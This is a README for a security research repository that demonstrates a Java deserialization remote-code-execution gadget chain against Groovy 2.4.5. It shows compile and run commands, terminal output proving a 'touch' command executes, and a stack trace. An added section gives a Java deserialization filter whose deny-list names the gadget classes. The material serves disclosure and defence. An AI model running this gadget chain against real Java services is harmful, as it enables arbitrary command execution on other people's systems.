
groovy-2.4.5-exploit

This is the Java code related to our blog post https://codewhitesec.blogspot.com/2018/01/handcrafted-gadgets.html.

In order to compile the two Java files you first need to build JRE8Exploit-1.0-SNAPSHOT.jar (the project can be found here: https://github.com/pwntester/JRE8u20_RCE_Gadget). You also need the Groovy 2.4.5 library, of course.

kai@CodeVM:~/groovy-2.4.5-exploit$ java -version
openjdk version "1.8.0_151"
OpenJDK Runtime Environment (build 1.8.0_151-8u151-b12-0ubuntu0.17.04.2-b12)
OpenJDK 64-Bit Server VM (build 25.151-b12, mixed mode)

Compile code:

kai@CodeVM:~/groovy-2.4.5-exploit$ javac -cp /home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget.java BCSSerializationTest.java

Create BeanContextSupport example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar BCSSerializationTest > bcstest.bin
Writing java.lang.Class at offset 1048
Done writing java.lang.Class at offset 1094
Writing java.util.HashMap at offset 1094
Done writing java.util.HashMap at offset 1172
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19

Deserialize example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser bcstest.bin
{java.beans.beancontext.BeanContextSupport@27d6c5e0=whatever}

Groovy RCE gadget

kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
ls: cannot access './testforblog': No such file or directory
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget exploit "touch ./testforblog" > exploit.bin
Writing org.codehaus.groovy.runtime.MethodClosure at offset 973
Done writing org.codehaus.groovy.runtime.MethodClosure at offset 1490
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19
Adjusting reference from: 4 to: 27
Adjusting reference from: 4 to: 27
Adjusting reference from: 7 to: 30
Adjusting reference from: 1 to: 24
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser exploit.bin
Exception in thread "main" java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.util.Set
	at com.sun.proxy.$Proxy2.entrySet(Unknown Source)
	at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at java.util.HashMap.readObject(HashMap.java:1409)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at Groovy245Gadget.main(Groovy245Gadget.java:43)
kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
-rw-r--r-- 1 kai kai 0 Jan 18 15:29 ./testforblog
kai@CodeVM:~/groovy-2.4.5-exploit$ 
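The transcript above shows the defender-relevant detail: `./testforblog` already exists by the time the `ClassCastException` is thrown, i.e. the command runs inside `readObject` and the exception only surfaces afterwards. Catching exceptions around `readObject()` is therefore no defense; the stream has to be rejected before the gadget classes are instantiated. The following is an added example, not code from this repository or from the blog post, of a JEP 290 deserialization filter (`java.io.ObjectInputFilter`, Java 9+; on 8u121+ the same API exists as `sun.misc.ObjectInputFilter` with `ObjectInputFilter.Config.setObjectInputFilter(ois, filter)`). The rejected packages are taken from the class names visible in the README's own output and stack trace; the `java.util.*`/`java.lang.*` allow-list and the limits are assumptions chosen for the demo payload, and `FilteredDeserializer` and its methods are hypothetical names.

```java
import java.beans.beancontext.BeanContextSupport;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

// Added example, not part of the groovy-2.4.5-exploit project: a JEP 290
// deserialization filter that rejects the classes seen in the README's output
// and turns everything else into an allow-list.
public class FilteredDeserializer {

    // Pattern syntax of ObjectInputFilter.Config.createFilter, first match wins:
    // "!" rejects; "pkg.**" covers a package and its subpackages; "pkg.*" only
    // that package; a bare trailing "*" is a prefix match. The limits bound
    // nesting depth, back-references and total stream size.
    static final String PATTERN =
            "!org.codehaus.groovy.**;"         // MethodClosure (the Groovy gadget class)
          + "!sun.reflect.annotation.**;"     // AnnotationInvocationHandler
          + "!java.beans.beancontext.**;"     // BeanContextSupport
          + "!com.sun.proxy.**;!jdk.proxy*;"  // dynamic proxy classes ($ProxyN)
          + "java.util.*;java.lang.*;"        // assumed allow-list for this demo's payload
          + "!*;"                             // reject anything not listed above
          + "maxdepth=20;maxrefs=1000;maxbytes=65536";

    private static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(PATTERN);

    // Deserializes through the filter. A rejected class raises InvalidClassException
    // when its class descriptor is read, before any readObject() hook of that class runs.
    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign payload: a HashMap of Strings, permitted by the allow-list.
        Map<String, String> benign = new HashMap<>();
        benign.put("key", "value");
        Object roundTripped = readFiltered(serialize(benign));
        System.out.println("allowed: " + roundTripped);

        // Constructed payload using the class the README's first run serializes
        // (java.beans.beancontext.BeanContextSupport); harmless on its own, but
        // rejected here because its package is on the deny-list.
        byte[] bcs = serialize(new BeanContextSupport());
        try {
            readFiltered(bcs);
            System.out.println("UNEXPECTED: BeanContextSupport was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage()); // "filter status: REJECTED"
        }
    }
}
```

Compile and run with `javac FilteredDeserializer.java && java FilteredDeserializer` on Java 9 or later. The allow-list is the part that matters: deny-listing the packages from one stack trace only blocks this chain, whereas `!*` after an explicit allow-list rejects any gadget class the application never expected to read, regardless of which library it lives in.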

Contributors

kaidentity
